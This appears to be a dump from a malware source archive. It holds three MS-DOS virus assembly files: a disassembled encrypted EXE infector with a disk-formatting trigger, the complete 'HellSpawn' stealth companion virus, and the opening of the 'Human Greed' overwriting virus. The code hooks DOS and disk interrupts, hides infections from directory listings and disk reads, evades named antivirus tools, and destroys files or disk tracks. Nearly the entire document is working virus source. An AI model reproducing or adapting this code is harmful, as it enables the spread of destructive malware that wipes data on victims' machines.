ASSUME CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING
P00100 PROC
ORG 0100h
START: JMP Short BEGIN
;---------------------------------------------------
NOP
ENCRKEY:DB 0Ch,32h ; 32h may not be needed... ;OR AH,32
BEGIN: CALL CRYPT ; Decrypt the virus
JMP H00520
;---------------------------------------------------
CRYPT: PUSH CX
MOV SI,OFFSET MESSAGE
MOV DI,SI
MOV CX,0766h
CLD
LOOP_1: LODSW
XOR AX,DS:ENCRKEY ;DS may not be needed
STOSW
DEC CX
JNZ LOOP_1
POP CX
RET
;---------------------------------------------------
INFECT: MOV DX,0100h ;Offset to begin at
MOV BX,DS:[HANDLE] ;BX=File handle
PUSH BX ;I don't know why, BX doesn't change.
MOV CX,062Ch ;CX=number of bytes to write
CALL CRYPT ;Encrypt before saving
POP BX ;I don't know why, BX doesn't change.
MOV AX,4000h ;AH = 40h, write to file.
INT 21h ;Infect the file.
PUSH BX ;Again, BX never changes.
CALL CRYPT ; . . . . . . . . .
POP BX
RET ;RET_Near
;---------------------------------------------------
; This is the big, red, block letters that shows when it goes off.
MESSAGE:
DB 0Fh,10h,18h,19h,1Fh,"I'll be back..."
DB 18h,18h,14h,20h,20h,00Ch,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h
DB 20h,0DEh,10h,19h,05h,14h,19h,05h,0DEh,10h,20h,20h,14h,19h,06h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh,18h,20h,20h,0DEh,10h
DB 20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,20h,20h
DB 0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,05h,14h,19h,06h,16h,0DEh
DB 10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h
DB 05h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,06h,0DEh,18h,20h
DB 20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h
DB 04h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,05h,14h,20h
DB 20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h
DB 20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h
DB 20h,16h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h
DB 0DEh,10h,20h,20h,14h,20h,20h,16h,0DEh,18h,14h,19h,05h,0DEh,10h,20h
DB 14h,19h,05h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh
DB 10h,19h,05h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h
DB 20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h
DB 19h,05h,16h,0DEh,10h,20h,14h,19h,04h,0DEh,10h,20h,20h,14h,20h,20h
DB 0DEh,10h,20h,20h,14h,20h,20h,0DEh,18h,20h,20h,0DEh,10h,20h,14h,20h,20h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,0DEh,10h,19h
DB 04h,14h,20h,20h,0DEh,10h,19h,05h,14h,19h,04h,0DEh,10h,19h,02h,14h
DB 19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,20h,20h,16h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,19h,04h,14h,19h,04h,16h,0DEh,18h,14h
DB 20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h
DB 20h,14h,19h,05h,0DEh,10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h
DB 0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,18h,20h,20h,0DEh
DB 10h,20h,14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h
DB 0DEh,10h,20h,14h,19h,06h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h
DB 20h,20h,0DEh,10h,20h,14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,10h,20h
DB 14h,20h,20h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h,14h,19h,05h,0DEh,10h,20h
DB 14h,20h,20h,0DEh,10h,20h,20h,14h,20h,20h,0DEh,18h,20h,10h,19h,03h,14h
DB 20h,10h,19h,02h,14h,20h,20h,10h,19h,05h,14h,20h,20h,10h,19h,06h,14h,20h
DB 20h,10h,20h,20h,14h,20h,10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h
DB 02h,14h,20h,10h,19h,02h,14h,20h,20h,10h,20h,20h,14h,20h,10h,19h
DB 03h,14h,20h,20h,10h,19h,06h,14h,20h,20h,10h,19h,04h,14h,20h
DB 10h,19h,02h,14h,20h,20h,18h,20h,10h,19h,03h,14h,20h,10h,19h,02h
DB 14h,20h,10h,19h,06h,14h,20h,10h,19h,07h,14h,20h,10h,19h,02h,14h
DB 20h,10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h,06h,14h,20h
DB 10h,19h,02h,14h,20h,10h,19h,03h,14h,20h,10h,19h,07h,14h,20h,10h,19h
DB 05h,14h,20h,10h,19h,03h,14h,20h,18h,20h,10h,19h,00Fh,14h,20h,10h,19h
DB 07h,14h,20h,10h,19h,02h,14h,20h,10h,19h,07h,14h,20h,10h,19h,06h
DB 14h,20h,10h,19h,07h,14h,20h,10h,19h,07h,14h,20h,10h,19h,00Ah,14h
DB 20h,18h,20h,10h,19h,00Fh,14h,20h,10h,19h,07h,14h,20h,10h,19h,13h,14h
DB 20h,10h,19h,10h,14h,20h,18h,10h,19h,40h,14h,20h,18h,18h,2Ah
;---------------------------------------------------
DB 00 ;00454
DB "*.EXE" ;00455
DB 00h,"\",00h,03h ;0045A
DB 8 DUP("?") ;0045E 3F
DB " " ;00466 202020
;---------------------------------------------------
;This area is perplexing. Doesn't seem to be ever called, nor read from.
ADC AX,[BP+DI] ;00469 1303 __
ADD [BX+SI],AL ;0046B 0000 __
ADD [BP+SI],CH ;0046D 002A _*
SHR BP,1 ;0046F D1ED __
DEC DX ;00471 4A J
ADC DL,DS:[0E278h] ;00472 121678E2 __x_
PUSH SS ;00476 16 _
ADD [BX+SI],AL ;00477 0000 __
ADD [BX+SI],AL ;00479 0000 __
;---------------------------------------------------
DB "ARMOR" ;0047B 41524D4F52
DB 00h ;00480
DB " " ;00481 2020
DB 00h ;00483
DB 00h ;00484
DB 00h ;00485
DB 00h ;00486
DB 00h ;00487
DB 03h ;00488
DB 8 DUP("?") ;00489 3F
DB "EXE" ;00491 455845
DB 07h ;00494
DB 04h ;00495
DB 00h ;00496
DB "3" ;00497 33
DB 1Fh ;00498
DB "*" ;00499 2A
DB 0D1h ;0049A
DB 0EDh ;0049B
DB "J " ;0049C 4A20
DB 02h ;0049E
DB "x" ;0049F 78
DB 0F0h ;004A0
DB 16h ;004A1
DB 02h ;004A2
DB 00h ;004A3
DB 00h ;004A4
DB 00h ;004A5
DB "SAMPLE3.EXE" ;004A6 53414D504C4533
DB 00h ;004B1
DB 00h ;004B2
DB 9Eh ;004B3
DB "-]" ;004B4 2D5D
DB 04h ;004B6
DB 88h ;004B7
DB 04h ;004B8
DB 9Eh ;004B9
DB "-" ;004BA 2D
DB 00h ;004BB
DB "ARMOR" ;004BC 41524D4F52
DB 00h ;004C1
DB 58 DUP(00h) ;004C2
HANDLE: DB 05h ;004FC
DB 00h ;004FD
DB 02h ;004FE
DB "x" ;004FF 78
DB 0F0h ;00500
DB 16h ;00501
DB " " ;00502 20
DB 00h ;00503
DB 0CDh ;00504
DB " " ;00505 20
DB 00h ;00506
DB 00h ;00507
DB "Written by Dennis Yelle" ;00508 5772697474656E
DB 00h ;0051F
;---------------------------------------------------
; Create new encryption key
H00520: MOV AX,3000h ;00520 B80030 __0
INT 21h ;2-DOS_Ver ;00523 CD21 _!
CMP AL,02h ;00525 3C02 <_
JB H0056B ;00527 7242 rB
MOV AH,2Ch ;00529 B42C _,
INT 21h ;1-Get_Time ;0052B CD21 _!
MOV DS:[0103h],DX ;0052D 89160301 ____
; Check to see if it's the last Friday in month, if so, go off.
H00531: MOV AH,2Ah ;00531 B42A _*
INT 21h ;1-Get_Date ;00533 CD21 _!
CMP DL,19h ;00535 80FA19 ___
JL H0053E ;00538 7C04 |_
CMP AL,05h ;0053A 3C05 <_
JZ H00541 ;0053C 7403 t_
H0053E: JMP H005F2 ;0053E E9B100 ___
;---------------------------------------------------
; GO OFF!
H00541: MOV AH,0Fh ;00541 B40F
INT 10h ;Get current vid mode ;00543 CD10
CMP AL,07h ;00545 3C07
JZ H00568 ;If mono, format ;00547 741F
MOV AX,0003h ;80x25 16 color ;00549 B80300
INT 10h ;Set video mode ;0054C CD10
MOV AH,01h ;0054E B401
MOV CX,0808h ;No cursor ;00550 B90808
INT 10h ;Set cursor size ;00553 CD10
MOV SI,013Ah ;00555 BE3A01
MOV AX,0B800h ;Video segment ;00558 B800B8
MOV ES,AX ;ES_Chg ;0055B 8EC0
MOV DI,0000h ; ;0055D BF0000
MOV CX,0319h ;00560 B91903
CALL H0057E ; . . . . . . . . . ;00563 E81800
JMP Short H00531 ;00566 EBC9
;---------------------------------------------------
H00568: JMP Short H005DC ;00568 EB72 _r
;---------------------------------------------------
NOP ;0056A 90 _
H0056B: JMP H0061E ;0056B E9B000 ___
;---------------------------------------------------
DB " -=PHALCON=- " ;0056E 20202D3D504841
DB 00h ;0057D
;---------------------------------------------------
; Display message... TheDraw algorythm for unpacking image.
H0057E: JCXZ H005DB ;Jumps to a ret ;0057E E35B _[
MOV DX,DI ;00580 8BD7 __
XOR AX,AX ;00582 33C0 3_
CLD ;00584 FC _
H00585: LODSB ;Take a byte ;00585 AC _
CMP AL,20h ;If it's <space ;00586 3C20 <
JB H0058F ;Jump ;00588 7205 r_
STOSW ;Move to screen ;0058A AB _
H0058B: LOOP H00585 ;0058B E2F8 __
JMP Short H005DB ;0058D EB4C _L
;---------------------------------------------------
H0058F: CMP AL,10h ;If it's not<10h ;0058F 3C10 <_
JNB H0059A ;Jump ;00591 7307 s_
AND AH,0F0h ;00593 80E4F0 ___
OR AH,AL ;00596 0AE0 __
JMP Short H0058B ;00598 EBF1 __
;---------------------------------------------------
H0059A: CMP AL,18h ;0059A 3C18 <_
JZ H005B1 ;0059C 7413 t_
JNB H005B9 ;0059E 7319 s_
SUB AL,10h ;005A0 2C10 ,_
ADD AL,AL ;005A2 02C0 __
ADD AL,AL ;005A4 02C0 __
ADD AL,AL ;005A6 02C0 __
ADD AL,AL ;005A8 02C0 __
AND AH,8Fh ;005AA 80E48F ___
OR AH,AL ;005AD 0AE0 __
JMP Short H0058B ;005AF EBDA __
;---------------------------------------------------
H005B1: ADD DX,00A0h ;005B1 81C2A000 ____
MOV DI,DX ;005B5 8BFA __
JMP Short H0058B ;005B7 EBD2 __
;---------------------------------------------------
H005B9: CMP AL,1Bh ;005B9 3C1B <_
JB H005C4 ;005BB 7207 r_
JNZ H0058B ;005BD 75CC u_
XOR AH,80h ;005BF 80F480 ___
JMP Short H0058B ;005C2 EBC7 __
;---------------------------------------------------
H005C4: CMP AL,19h ;005C4 3C19 <_
MOV BX,CX ;005C6 8BD9 __
LODSB ;005C8 AC _
MOV CL,AL ;005C9 8AC8 __
MOV AL,20h ;005CB B020 _
JZ H005D1 ;005CD 7402 t_
LODSB ;005CF AC _
DEC BX ;005D0 4B K
H005D1: XOR CH,CH ;005D1 32ED 2_
INC CX ;005D3 41 A
REPZ STOSW ;005D4 F3AB __
MOV CX,BX ;005D6 8BCB __
DEC CX ;005D8 49 I
LOOPNZ H00585 ;005D9 E0AA __
H005DB: RET ;RET_Near ;005DB C3 _
;End of display message procedure
;---------------------------------------------------
H005DC: MOV AH,15h ;005DC B415 __
MOV DL,80h ;005DE B280 __
INT 13h ;BAT-Dsk_Type ;005E0 CD13 __
CMP AH,03h ;005E2 80FC03 ___
JNZ H005F2 ;005E5 750B u_
MOV AX,0504h ;005E7 B80405 ___
MOV CX,DS:[0103h] ;005EA 8B0E0301 ____
MOV DL,80h ;005EE B280 __
INT 13h ;B-Fmt_FD_Trk ;005F0 CD13 __
H005F2: MOV DX,045Dh ;005F2 BA5D04 _]_
MOV AH,1Ah ;005F5 B41A __
INT 21h ;1-Set_DTA ;005F7 CD21 _!
MOV AH,19h ;005F9 B419 __
INT 21h ;1-Get_Cur_Dr ;005FB CD21 _!
MOV DL,AL ;005FD 8AD0 __
INC DL ;005FF FEC2 __
MOV AH,47h ;00601 B447 _G
MOV SI,04BCh ;00603 BEBC04 ___
INT 21h ;2-Cur_Dir ;00606 CD21 _!
MOV DX,045Bh ;00608 BA5B04 _[_
MOV AH,3Bh ;0060B B43B _;
INT 21h ;2-Chg_Dir ;0060D CD21 _!
MOV CX,0013h ;0060F B91300 ___
MOV DX,0453h ;00612 BA5304 _S_
MOV AH,4Eh ;00615 B44E _N
INT 21h ;2-Srch_1st_Fl_Hdl ;00617 CD21 _!
CMP AX,0012h ;00619 3D1200 =__
JNZ H00621 ;0061C 7503 u_
H0061E: JMP Short H00671 ;0061E EB51 _Q
;---------------------------------------------------
NOP ;00620 90 _
H00621: MOV AH,4Fh ;00621 B44F _O
INT 21h ;2-Srch_Nxt_Fl_Hdl ;00623 CD21 _!
CMP AX,0012h ;00625 3D1200 =__
JZ H00671 ;00628 7447 tG
MOV DX,047Bh ;0062A BA7B04 _{_
MOV AH,3Bh ;0062D B43B _;
INT 21h ;2-Chg_Dir ;0062F CD21 _!
MOV AH,2Fh ;00631 B42F _/
INT 21h ;2-Get_DTA ;00633 CD21 _!
MOV DS:[04B3h],ES ;00635 8C06B304 ____
MOV DS:[04B5h],BX ;00639 891EB504 ____
MOV DX,0488h ;0063D BA8804 ___
MOV AH,1Ah ;00640 B41A __
INT 21h ;1-Set_DTA ;00642 CD21 _!
MOV CX,0007h ;00644 B90700 ___
MOV DX,0455h ;00647 BA5504 _U_
MOV AH,4Eh ;0064A B44E _N
INT 21h ;2-Srch_1st_Fl_Hdl ;0064C CD21 _!
CMP AX,0012h ;0064E 3D1200 =__
JNZ H00674 ;00651 7521 u!
H00653: MOV AH,4Fh ;00653 B44F _O
INT 21h ;2-Srch_Nxt_Fl_Hdl ;00655 CD21 _!
CMP AX,0012h ;00657 3D1200 =__
JNZ H00674 ;0065A 7518 u_
MOV DX,045Bh ;0065C BA5B04 _[_
MOV AH,3Bh ;0065F B43B _;
INT 21h ;2-Chg_Dir ;00661 CD21 _!
MOV AH,1Ah ;00663 B41A __
MOV DS,DS:[04B3h] ;DS_Chg ;00665 8E1EB304 ____
MOV DX,DS:[04B5h] ;00669 8B16B504 ____
INT 21h ;1-Set_DTA ;0066D CD21 _!
JMP Short H00621 ;0066F EBB0 __
;---------------------------------------------------
H00671: JMP Short H006EC ;00671 EB79 _y
;---------------------------------------------------
NOP ;00673 90 _
H00674: MOV AH,2Fh ;00674 B42F _/
INT 21h ;2-Get_DTA ;00676 CD21 _!
MOV DS:[04B9h],ES ;00678 8C06B904 ____
MOV DS:[04B7h],BX ;0067C 891EB704 ____
MOV DX,04A6h ;00680 BAA604 ___
MOV BX,0488h ;00683 BB8804 ___
MOV AX,[BX+18h] ;00686 8B4718 _G_
MOV DS:[0500h],AX ;00689 A30005 ___
MOV AX,[BX+16h] ;0068C 8B4716 _G_
MOV DS:[04FEh],AX ;0068F A3FE04 ___
MOV AX,[BX+15h] ;00692 8B4715 _G_
MOV AX,4300h ;00695 B80043 __C
INT 21h ;2-Fl_Hdl_Attr ;00698 CD21 _!
MOV DS:[0502h],CX ;0069A 890E0205 ____
MOV AX,4301h ;0069E B80143 __C
XOR CX,CX ;006A1 33C9 3_
INT 21h ;1-TERM_norm:21h-00h;006A3 CD21 _!
;---------------------------------------------------
MOV AX,3D00h ;006A5 B8003D __=
INT 21h ;2-Open_Fl_Hdl ;006A8 CD21 _!
JB H006CF ;006AA 7223 r#
MOV DS:[HANDLE],AX ;006AC A3FC04 ___
MOV AH,3Fh ;006AF B43F _?
MOV BX,DS:[HANDLE] ;006B1 8B1EFC04 ____
MOV CX,0002h ;006B5 B90200 ___
MOV DX,0504h ;006B8 BA0405 ___
INT 21h ;2-Rd_Fl_Hdl ;006BB CD21 _!
MOV AH,3Eh ;006BD B43E _>
MOV BX,DS:[HANDLE] ;006BF 8B1EFC04 ____
INT 21h ;2-Close_Fl_Hdl ;006C3 CD21 _!
MOV BX,DS:[0504h] ;006C5 8B1E0405 ____
CMP BX,03EBh ;006C9 81FBEB03 ____
JNZ H006DE ;006CD 750F u_
H006CF: MOV AH,1Ah ;006CF B41A __
MOV DS,DS:[04B9h] ;DS_Chg ;006D1 8E1EB904 ____
MOV DX,DS:[04B7h] ;006D5 8B16B704 ____
INT 21h ;1-Set_DTA ;006D9 CD21 _!
JMP H00653 ;006DB E975FF _u_
;---------------------------------------------------
H006DE: MOV DX,04A6h ;006DE BAA604 ___
MOV AX,3D02h ;006E1 B8023D __=
INT 21h ;2-Open_Fl_Hdl ;006E4 CD21 _!
MOV DS:[HANDLE],AX ;006E6 A3FC04 ___
CALL INFECT ; . . . . . . . . . ;006E9 E834FA _4_
H006EC: MOV AX,5701h ;006EC B80157 __W
MOV BX,DS:[HANDLE] ;006EF 8B1EFC04 ____
MOV CX,DS:[04FEh] ;006F3 8B0EFE04 ____
MOV DX,DS:[0500h] ;006F7 8B160005 ____
INT 21h ;2-Fl_Hdl_Date_Time ;006FB CD21 _!
MOV AX,4301h ;006FD B80143 __C
MOV CX,DS:[0502h] ;00700 8B0E0205 ____
MOV DX,04A6h ;00704 BAA604 ___
INT 21h ;2-Fl_Hdl_Attr ;00707 CD21 _!
MOV AH,3Bh ;00709 B43B _;
MOV DX,045Bh ;0070B BA5B04 _[_
INT 21h ;2-Chg_Dir ;0070E CD21 _!
MOV AH,3Bh ;00710 B43B _;
MOV DX,04BCh ;00712 BABC04 ___
INT 21h ;2-Chg_Dir ;00715 CD21 _!
MOV AX,4C00h ;00717 B8004C __L
INT 21h ;2-TERM_w_Ret_Cd ;0071A CD21 _!
;---------------------------------------------------
DB "Hellraiser/SKISM" ;0071C 48656C6C726169
;---------------------------------------------------
P00100 ENDP
CODE ENDS
END H00100
;-------------------------------------------------------------------------------

580
MSDOS/Virus.MSDOS.Unknown.hspawn.asm Normal file
View File

@ -0,0 +1,580 @@
; HellSpawn Virus (c) 1993 by Stormbringer
;
;
; Ò Stormbringer
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÄÄÄÄ
; Ð
.model tiny
.radix 16
.code
org 100
start:
jmp EntryPoint
FindZero:
lodsb
or al,al
jne FindZero
cmp ds:[si-4],'XE'
je InfectOnOpen
cmp ds:[si-4],'OC'
jne Doneopen
OpenRequestedFile:
mov ax,3d00
pushf
call dword ptr cs:[IP_21]
xchg bx,ax
xor cx,cx
xor dx,dx
mov ax,4202
call FakeInt21
cmp ax,endmain-start
jne CloseUp
pop di si ds es dx cx bx ax
stc
retf 002
CloseUp:
jc CloseUp
mov ah,3e
call FakeInt21
doneOPen:
pop di si ds es dx cx bx ax
jmp Go21
InfectOnOpen:
pop di si ds es dx cx bx ax
jmp Execute
NewOpen:
push ax bx cx dx es ds si di
mov dx,si
jmp FindZero
Open:
push ax bx cx dx es ds si di
mov si,dx
jmp FindZero
Terminateprog:
mov byte ptr cs:[StealthOn],1
jmp Go21
Int21:
cmp ah,4c
je Terminateprog
or ah,ah
je Terminateprog
cmp byte ptr cs:[StealthOn],0
je AfterStealthChecks
cmp ah,11h
je FindFile
cmp ah,12h
je FindFile
cmp ah,4eh
je FindHandle
cmp ah,4fh
je FindHandle
AfterStealthChecks:
cmp ax,6c00
je NewOpen
cmp ah,3dh
je Open
cmp ax,4b00h
jne Go21
jmp Execute
Go21:
jmp dword ptr cs:[IP_21]
FindHandle:
pushf
call dword ptr cs:[IP_21]
jc ErrorHandleCall
push ax bx cx dx es ds si di
GetDTA:
mov ah,2f
call FakeInt21
cmp word ptr es:[bx+1a],endmain-start ;Check size
jne EndHandle
mov ah,byte ptr es:[bx+15]
and ah,2
jz Endhandle
pop di si ds es dx cx bx ax
mov ah,4f
jmp FindHandle
EndHandle:
pop di si ds es dx cx bx ax
clc
DoneHandleStealth:
retf 02
ErrorHandleCall:
mov ah,12
retf 02
FindFile:
call FakeInt21
cmp al,0ff
je ErrorFF
Stealth:
push ax bx cx dx es ds si di
mov ah,2f
call FakeInt21
cmp byte ptr es:[bx],0ff
jne NotExtended
add bx,7
NotExtended:
cmp word ptr [bx+9],'OC'
jne DoneFF
cmp word ptr [bx+1dh],endmain-start
jne DoneFF
FindNextFile:
pop di si ds es dx cx bx ax
mov ah,12
jmp FindFile
DoneFF:
pop di si ds es dx cx bx ax
iret
ErrorFF:
mov al,0ff
iret
Execute:
push ax bx cx dx es ds si di
call SetCritical
mov si,dx
FindEndOfFilename:
lodsb
or al,al
jne FindEndOfFilename
CheckForCHKDSK:
cmp word ptr ds:[si-9],'DK'
jne AfterChkdsk
mov byte ptr cs:[StealthOn],0
AfterChkdsk:
cmp byte ptr ds:[si-0a],'-' ;If it's f-prot, exit
je EndExec
cmp word ptr ds:[si-4],'XE'
jne EndExec
mov si,dx
mov di,offset filename
push cs
pop es
CopyFilename:
lodsb
stosb
or al,al
jne CopyFilename
push cs
pop ds
ChangeToCom:
mov word ptr es:[di-4],'OC'
mov byte ptr es:[di-2],'M'
CheckIfThere:
mov ax,3d00
mov dx,offset filename
call FakeInt21
xchg bx,ax
jnc CloseVirus
PlaceVirus:
mov ah,3c
mov cx,2
mov dx,offset Filename
call FakeInt21
jc EndEXEC
WriteVirus:
inc byte ptr [InfectionCounter]
xchg bx,ax
mov ah,40
mov cx,endmain-start
mov dx,100
call FakeInt21
CloseVirus:
mov ah,3e
call FakeInt21
EndExec:
call ResetCritical
pop di si ds es dx cx bx ax
jmp Go21
Error13:
stc
retf 02
Int13:
cmp ah,02
je IsDiskRead
jmp GoInt13
IsDiskRead:
pushf
call dword ptr cs:[IP_13]
jc Error13
AbsStealth:
push ax bx cx dx es ds si di
push cs
pop ds
mov di,bx
mov si,100
mov cx,100
repz cmpsb
jcxz IsVirus
jmp DoneAbsStealth
IsVirus:
mov di,bx
mov ax,9090
mov cx,0fe
repnz stosw
mov ax,20cdh
stosw
DoneAbsStealth:
pop di si ds es dx cx bx ax
clc
retf 002
EntryPoint:
push ds
mov ax,ds
dec ax
mov ds,ax
mov byte ptr ds:[0],'Z' ;Mark as last in chain
sub word ptr ds:[03],80 ;Allocate Space From MCB (2k)
sub word ptr ds:[12],80 ;Allocate Space From PSP (2k)
xor ax,ax
mov ds,ax
dec word ptr ds:[413] ;Allocate Memory From Bios (2k)
dec word ptr ds:[413]
mov ax,word ptr ds:[413]
CopyVirusToMem:
mov cl,6
shl ax,cl
sub ax,10
mov es,ax
pop ds
push ds
mov si,100
mov di,100
mov cx,end_prog-start
repnz movsb
;BX = IP of new int, CX = CS, DX = IntNum
;DI = address of interrupt storage
SetInterrupts:
xor ax,ax
mov ds,ax
cli
SetInt21:
mov ax,offset Int21
mov bx,es
xchg ax,word ptr ds:[21*4]
xchg bx,word ptr ds:[21*4+2]
mov word ptr es:[IP_21],ax
mov word ptr es:[CS_21],bx
SetInt13:
mov ax,offset Int13
mov bx,es
xchg ax,word ptr ds:[13*4]
xchg bx,word ptr ds:[13*4+2]
mov word ptr es:[IP_13],ax
mov word ptr es:[CS_13],bx
SetInt10:
mov ax,offset Int10
mov bx,es
xchg ax,word ptr ds:[10*4]
xchg bx,word ptr ds:[10*4+2]
mov word ptr es:[IP_10],ax
mov word ptr es:[CS_10],bx
SetInt1c:
mov ax,offset Int1c
mov bx,es
xchg ax,word ptr ds:[1c*4]
xchg bx,word ptr ds:[1c*4+2]
mov word ptr es:[IP_1c],ax
mov word ptr es:[CS_1c],bx
SetInt09:
mov ax,offset Int09
mov bx,es
xchg ax,word ptr ds:[09*4]
xchg bx,word ptr ds:[09*4+2]
mov word ptr es:[IP_09],ax
mov word ptr es:[CS_09],bx
sti
push cs
pop ds
mov byte ptr cs:[StealthOn],1
RunOriginalProgram:
mov ax,ds:[2c]
mov ds,ax
xor si,si
FindPath:
lodsw
or ax,ax
je FoundPath
dec si
jmp FindPath
FoundPath:
lodsw
ChangeFilenameToEXE:
push ds
pop es
mov di,si
xor al,al
mov cx,0ff
repnz scasb
mov word ptr es:[di-4],'XE'
mov byte ptr es:[di-2],'E'
push cs
pop es
mov ah,4a
mov bx,(end_prog-start+10f)/10
int 21
mov cx,di
sub cx,si
dec cx
mov di,offset Filename
mov al,cl
stosb
repnz movsb
mov byte ptr es:[di],0dh
mov si,offset Filename
push cs
pop ds
int 2e ;Execute Command
mov ax,4c00
int 21
FakeInt21:
pushf
call dword ptr cs:[IP_21]
ret
SetCritical:
push ax bx ds
xor ax,ax
mov ds,ax
mov ax,offset CriticalHandler
mov bx,cs
cli
xchg ds:[24*4],ax
xchg ds:[24*4+2],bx
mov word ptr cs:[CS_24],bx
mov word ptr cs:[IP_24],ax
sti
pop ds bx ax
ret
ResetCritical:
push ax bx ds
xor ax,ax
mov ds,ax
mov ax,word ptr cs:[IP_24]
mov bx,word ptr cs:[CS_24]
cli
mov word ptr ds:[24*4],ax
mov word ptr ds:[24*4+2],bx
sti
pop ds bx ax
ret
CriticalHandler:
mov al,3
iret
Credits db 'HellSpawn v0.91a (c) 1993 by Stormbringer'
EndCred:
Int10:
cmp ah,0
jne GoInt10
mov byte ptr cs:[FireActive],0
cmp al,13
jne GoInt10
mov byte ptr cs:[FireActive],1
GoInt10:
db 0ea
IP_10 dw 0
CS_10 dw 0
Int09:
push ax
in al,60h
cmp al,53h
je IsDel
NotCtrlAltDel:
pop ax
GoInt09:
db 0ea
IP_09 dw 0
CS_09 dw 0
IsDel:
mov ah,2
int 16
and al,1100b
cmp al,0c
jne NotCtrlAltDel
RebootActivation:
mov di,0b800
mov es,di
push cs
pop ds
mov si,offset Fire
mov ax,03
int 10
mov di,550
mov cx,7
BtBigLoop:
push cx
BtDrawFireLine:
mov cx,8
FireLine:
lodsb
mov ah,'Û'
xchg ah,al
stosw
loop FireLine
pop cx
add di,90
loop BtBigLoop
ColdBoot:
db 0ea
db 0,0,0ff,0ff
Int1c:
cmp byte ptr cs:[FireActive],1
jne JmpInt1c
push ax bx cx dx es ds si di
call DrawFire
call ReverseFlame
pop di si ds es dx cx bx ax
JmpInt1c:
db 0ea
IP_1c dw 0
CS_1c dw 0
DrawFire:
push cs
pop ds
mov si,offset Fire
mov di,0a000
mov es,di
xor di,di
mov cx,7
FireLoop:
push cx
mov cx,8
repnz movsb
add di,312d
pop cx
loop FireLoop
ret
ReverseFlame:
push cs cs
pop es ds
mov si,offset Fire
mov cx,7
FlipAll:
push cx
mov cx,4
mov di,si
add di,7
FlipLine:
mov al,byte ptr [si]
xchg al,byte ptr [di]
mov byte ptr [si],al
dec di
inc si
loop FlipLine
pop cx
loop FlipAll
ret
Fire:
db 00,04,00,00,00,00,00,00
db 00,04,0c,04,00,00,00,00
db 00,00,04,0c,04,00,00,00
db 00,00,04,0c,04,04,00,00
db 00,00,04,0e,0c,04,00,00
db 00,04,04,0c,0e,0c,04,00
db 04,04,0c,0e,0f,0c,0c,04
FireActive db 0
InfectionCounter db 0
GoInt13:
db 0ea
endmain:
IP_13 dw ?
CS_13 dw ?
IP_21 dw ?
CS_21 dw ?
CS_24 dw ?
IP_24 dw ?
StealthOn db ?
filename db 50 dup(?)
end_prog:
end start

233
MSDOS/Virus.MSDOS.Unknown.humgreed.asm Normal file
View File

@ -0,0 +1,233 @@
; VirusName : Human Greed
; Origin : Sweden
; Author : The Unforgiven
; Date : 20/12/93
;
; This is a "mutation" of the Infernal Demand virus, written by Metal
; Militia. Even if it's high modified, its ground is still the same.
; This is yet another of this simple overwriting virus, and it's
; nothing really to scream hurray for. This virus will search for
; exe or com files on drive C:, and then overwrite the first 666
; bytes, and therefor permantely destroy the victims. It used the
; "dot-dot" method for changing directory, and when all files are
; infected (overwritten), it will return to the original directory.
; The code is encrypted, thus making it hard to detect. Scan,
; MSAV, CPAV, FindViru, F-prot and TBScan can't find a shit.
; Yes, Tbscan used to find this as the "Infernal" virus, but he
; with his 90% (nice try!) failed again!, how patetic!
;
; If a infected file is being run, it's 50% that it will display
; this stupid "Program to big to fit in memory" message. Then
; if the message is printed on the screen, it'll throw the dice
; once more. If the number are 10 or lower, it'll simple wipe out
; the first sectors by overwrite them on your C: drive. This means
; that for each run, it's 5% that it'll "go-off".
; The "message dump" to a file under c:\ has also been deleted.
; And the new routines wich are included are, encryption,
; get/and restore directory, the randomizer, print faker, and
; of'cos the trash routine too. Hope you enjoy the code!
;===============================================================================
; **** HUMAN GREED ****
;===============================================================================
cseg segment byte public
assume cs:cseg, ds:cseg
org 100h
virus_start:
call encrypt_decrypt
jmp encryption_start
write_virus: ; write the virus to the
call encrypt_decrypt ; files, by overwriting
